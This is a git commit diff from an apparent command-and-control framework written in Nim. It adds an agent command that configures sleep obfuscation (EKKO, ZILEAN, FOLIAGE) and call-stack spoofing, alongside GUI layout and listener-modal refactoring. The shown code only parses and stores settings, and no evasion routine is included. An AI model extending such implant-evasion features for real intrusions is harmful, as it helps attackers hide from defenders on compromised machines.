Implemented dynamic sleepmask configuration command.

2025-09-19 10:11:20 +02:00
parent 971bb6c8df
commit 3173122878
4 changed files with 65 additions and 29 deletions
--- a/src/client/layout.ini
+++ b/src/client/layout.ini
@@ -5,10 +5,10 @@ Collapsed=0
 DockId=0x00000003,0

 [Window][Listeners]
-Pos=10,402
-Size=1888,587
+Pos=10,43
+Size=1477,357
 Collapsed=0
-DockId=0x00000007,0
+DockId=0x00000003,1

 [Window][Eventlog]
 Pos=1489,43
@@ -17,10 +17,10 @@ Collapsed=0
 DockId=0x00000004,0

 [Window][Dear ImGui Demo]
-Pos=10,402
-Size=1888,587
+Pos=1489,43
+Size=409,357
 Collapsed=0
-DockId=0x00000007,1
+DockId=0x00000004,1

 [Window][Dockspace]
 Pos=0,0
@@ -31,13 +31,13 @@ Collapsed=0
 Pos=956,326
 Size=942,663
 Collapsed=0
-DockId=0x00000008,0
+DockId=0x00000002,0

 [Window][[C9D8E7F6] charlie@SERVER-03]
-Pos=956,326
-Size=942,663
+Pos=10,402
+Size=1888,587
 Collapsed=0
-DockId=0x00000006,0
+DockId=0x00000002,0

 [Window][Debug##Default]
 Pos=60,60
@@ -48,19 +48,19 @@ Collapsed=0
 Pos=10,402
 Size=1888,587
 Collapsed=0
-DockId=0x00000007,1
+DockId=0x00000002,1

 [Window][[DEADBEEF] alice@DESKTOP-01]
 Pos=10,402
 Size=1888,587
 Collapsed=0
-DockId=0x00000007,1
+DockId=0x00000002,1

 [Window][Example: Console]
 Pos=10,572
 Size=2848,1113
 Collapsed=0
-DockId=0x00000007,2
+DockId=0x00000002,2

 [Window][Example: Assets Browser]
 Pos=60,60
@@ -135,14 +135,10 @@ Column 2  Weight=0.4873
 Column 3  Weight=0.9746

 [Docking][Data]
-DockNode        ID=0x00000009 Pos=100,200 Size=754,103 Selected=0x64D005CF
-DockSpace       ID=0x85940918 Window=0x260A4489 Pos=10,43 Size=1888,946 Split=Y
-  DockNode      ID=0x00000001 Parent=0x85940918 SizeRef=1024,357 Split=X
-    DockNode    ID=0x00000003 Parent=0x00000001 SizeRef=613,159 CentralNode=1 Selected=0x61E02D75
-    DockNode    ID=0x00000004 Parent=0x00000001 SizeRef=409,159 Selected=0x0FA43D88
-  DockNode      ID=0x00000002 Parent=0x85940918 SizeRef=1024,587 Split=X Selected=0x8D780333
-    DockNode    ID=0x00000005 Parent=0x00000002 SizeRef=944,663 Split=X Selected=0x8D780333
-      DockNode  ID=0x00000007 Parent=0x00000005 SizeRef=944,663 Selected=0x6BE22050
-      DockNode  ID=0x00000008 Parent=0x00000005 SizeRef=942,663 Selected=0x4AD091E6
-    DockNode    ID=0x00000006 Parent=0x00000002 SizeRef=942,663 Selected=0x65D642C0
+DockNode      ID=0x00000009 Pos=100,200 Size=754,103 Selected=0x64D005CF
+DockSpace     ID=0x85940918 Window=0x260A4489 Pos=10,43 Size=1888,946 Split=Y
+  DockNode    ID=0x00000001 Parent=0x85940918 SizeRef=1024,357 Split=X
+    DockNode  ID=0x00000003 Parent=0x00000001 SizeRef=613,159 CentralNode=1 Selected=0x61E02D75
+    DockNode  ID=0x00000004 Parent=0x00000001 SizeRef=409,159 Selected=0x5E5F7166
+  DockNode    ID=0x00000002 Parent=0x85940918 SizeRef=1024,587 Selected=0x65D642C0

--- a/src/client/views/modals/startListener.nim
+++ b/src/client/views/modals/startListener.nim
@@ -12,16 +12,13 @@ type
        protocol: int32
        protocols: seq[string]

-proc getProtocols(): seq[string] = 
-    for p in Protocol.low .. Protocol.high:
-        result.add($p)
-
 proc ListenerModal*(): ListenerModalComponent =
    result = new ListenerModalComponent
    zeroMem(addr result.address[0], 256)
    result.port = DEFAULT_PORT
    result.protocol = 0
-    result.protocols = getProtocols() 
+    for p in Protocol.low .. Protocol.high:
+        result.protocols.add($p)

 proc resetModalValues(component: ListenerModalComponent) = 
    zeroMem(addr component.address[0], 256)
--- a/src/common/types.nim
+++ b/src/common/types.nim
@@ -49,6 +49,7 @@ type
        CMD_UPLOAD = 14'u16
        CMD_SCREENSHOT = 15'u16
        CMD_DOTNET = 16'u16
+        CMD_SLEEPMASK = 17'u16

    ModuleType* = enum 
        MODULE_ALL = 1'u32
--- a/src/modules/sleep.nim
+++ b/src/modules/sleep.nim
@@ -2,6 +2,7 @@ import ../common/[types, utils]

 # Define function prototype
 proc executeSleep(ctx: AgentCtx, task: Task): TaskResult 
+proc executeSleepmask(ctx: AgentCtx, task: Task): TaskResult 

 # Module definition
 let module* = Module(
@@ -11,12 +12,23 @@ let module* = Module(
        Command(
            name: protect("sleep"),
            commandType: CMD_SLEEP,
-            description: protect("Update sleep delay configuration."),
+            description: protect("Update sleep delay settings."),
            example: protect("sleep 5"),
            arguments: @[
                Argument(name: protect("delay"), description: protect("Delay in seconds."), argumentType: INT, isRequired: true)
            ],
            execute: executeSleep
+        ),
+        Command(
+            name: protect("sleepmask"),
+            commandType: CMD_SLEEPMASK,
+            description: protect("Update sleepmask settings."),
+            example: protect("sleepmask ekko true"),
+            arguments: @[
+                Argument(name: protect("technique"), description: protect("Sleep obfuscation technique (NONE, EKKO, ZILEAN, FOLIAGE). Executing without arguments retrieves current sleepmask settings."), argumentType: STRING, isRequired: false),
+                Argument(name: protect("spoof"), description: protect("Use stack spoofing to obfuscate the call stack."), argumentType: BOOL, isRequired: false)
+            ],
+            execute: executeSleepmask
        )
    ]
 )
@@ -24,6 +36,7 @@ let module* = Module(
 # Implement execution functions
 when defined(server):
    proc executeSleep(ctx: AgentCtx, task: Task): TaskResult = nil
+    proc executeSleepmask(ctx: AgentCtx, task: Task): TaskResult = nil

 when defined(agent): 

@@ -45,3 +58,32 @@ when defined(agent):

        except CatchableError as err: 
            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))
+
+    proc executeSleepmask(ctx: AgentCtx, task: Task): TaskResult = 
+
+        try: 
+            echo fmt"   [>] Updating sleepmask settings."
+            
+            case int(task.argCount): 
+            of 0: 
+                # Retrieve sleepmask settings 
+                let response = fmt"Sleepmask settings: Technique: {$ctx.sleepTechnique}, Delay: {$ctx.sleep}ms, Stack spoofing: {$ctx.spoofStack}" & "\n"
+                return createTaskResult(task, STATUS_COMPLETED, RESULT_STRING, string.toBytes(response))
+
+            of 1: 
+                # Only set the sleepmask technique
+                let technique = parseEnum[SleepObfuscationTechnique](Bytes.toString(task.args[0].data).toUpperAscii())
+                ctx.sleepTechnique = technique
+
+            else: 
+                # Set sleepmask technique and stack-spoofing configuration
+                let technique = parseEnum[SleepObfuscationTechnique](Bytes.toString(task.args[0].data).toUpperAscii())
+                ctx.sleepTechnique = technique
+
+                let spoofStack = cast[bool](task.args[1].data[0]) # BOOLEAN values are just 1 byte
+                ctx.spoofStack = spoofStack
+
+            return createTaskResult(task, STATUS_COMPLETED, RESULT_NO_OUTPUT, @[])
+
+        except CatchableError as err: 
+            return createTaskResult(task, STATUS_FAILED, RESULT_STRING, string.toBytes(err.msg))